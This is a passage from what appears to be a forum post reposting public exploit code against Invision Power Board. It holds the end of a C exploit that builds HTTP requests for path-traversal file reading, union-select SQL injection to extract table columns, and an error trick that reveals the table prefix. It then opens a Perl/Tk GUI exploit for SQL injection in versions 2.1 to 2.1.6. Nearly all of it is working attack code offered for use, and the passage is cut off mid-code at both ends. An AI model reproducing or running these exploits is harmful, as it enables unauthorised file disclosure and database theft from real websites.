char * localfile = argv[5]; char * host = argv[3]; if (strcmp(type,"1")==0) { char exploit[1024]; strcpy(exploit, "GET /"); strcat(exploit, path); strcat(exploit, "?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir="); strcat(exploit, localfile); strcat(exploit, " HTTP/1.0\r\nHost: "); strcat(exploit, host); strcat(exploit, "\r\n\r\n"); Exploit(exploit, "readfile", host); } else if (strcmp(type,"2")==0) { char exploit[1024]; strcpy(exploit, "GET /"); strcat(exploit, path); strcat(exploit, "?act=gallery&code=viewimage&img=index.gif&dir="); strcat(exploit, localfile); strcat(exploit, " HTTP/1.0\r\nHost: "); strcat(exploit, host); strcat(exploit, "\r\n\r\n"); Exploit(exploit, "readfile", host); } // sql-injection exploit // } if(strcmp(mode,"sqlinject")==0) { char * host = argv[2]; char * path = argv[3]; char * prefix = argv[5]; char * column = argv[4]; char * table = argv[6]; char * id = argv[7]; char exploit[1024]; strcpy(exploit, "GET /"); strcat(exploit, path); strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=- 1%20union%20select%201,"); strcat(exploit, column); strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20"); strcat(exploit, prefix); strcat(exploit, table); strcat(exploit, "%20WHERE%20id="); strcat(exploit, id); strcat(exploit, "/*31337*/"); strcat(exploit, " HTTP/1.0\r\nHost: "); strcat(exploit, host); strcat(exploit, "\r\n\r\n"); Exploit(exploit, "sqlinject", host); } if (strcmp(mode,"getprefix")==0) { char * path = argv[3]; char * host = argv[2]; char exploit[1024]; strcpy(exploit, "GET /"); strcat(exploit, path); strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=- 1%20hellknightscrew"); strcat(exploit, " HTTP/1.0\r\nHost: "); strcat(exploit, host); strcat(exploit, "\r\n\r\n"); printf("\n\n\n[!] u can get database prefix from this error. example: SELECT * FROM <PREFIX>gallery_albums\n\n"); Exploit(exploit, "readfile", host); } WSACleanup(); return 0; } // milw0rm.com [2006-10-03] Chú ý code nên để trong tab [code] [_/code] famydmx(HCE) Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit Code: #!/usr/bin/perl ## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC ## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41 ## http://rst.void.ru/papers/advisory41.txt ## tested on 2.1.3, 2.1.6 ## ## 08.06.06 ## (c)oded by 1dt.w0lf ## RST/GHC ## http://rst.void.ru ## http://ghc.ru use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "r57ipb216gui" ); $mw->geometry ( '420x550' ) ; $mw->resizable(0,0); $mw->Label(-text => '!', -font => '{Webdings} 22')->pack(); $mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();